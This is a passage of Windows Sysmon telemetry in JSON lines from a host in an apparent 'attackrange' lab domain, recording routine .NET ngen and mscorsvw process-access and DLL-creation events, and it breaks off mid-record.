{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010D03C0F00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010D03C0F00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:43.450\r\nProcessGuid: {A837DB8D-04CF-5F25-0000-00102CED1000}\r\nProcessId: 4328\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e8-0\\System.Numerics.dll\r\nCreationUtcTime: 2020-08-01 05:59:43.450","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:43.450","ProcessGuid":"{A837DB8D-04CF-5F25-0000-00102CED1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e8-0\\System.Numerics.dll","CreationUtcTime":"2020-08-01 05:59:43.450","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.481\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010A2F01000}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.481","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010A2F01000}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010A2F01000}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010A2F01000}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010A2F01000}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010A2F01000}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.543\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001076F41000}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.543","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001076F41000}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.543\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001076F41000}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.543","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001076F41000}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001076F41000}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001076F41000}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:44.450\r\nProcessGuid: {A837DB8D-04CF-5F25-0000-001076F41000}\r\nProcessId: 4236\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\108c-0\\System.Printing.dll\r\nCreationUtcTime: 2020-08-01 05:59:44.450","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:44.450","ProcessGuid":"{A837DB8D-04CF-5F25-0000-001076F41000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\108c-0\\System.Printing.dll","CreationUtcTime":"2020-08-01 05:59:44.450","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:44.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-00100CFA1000}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 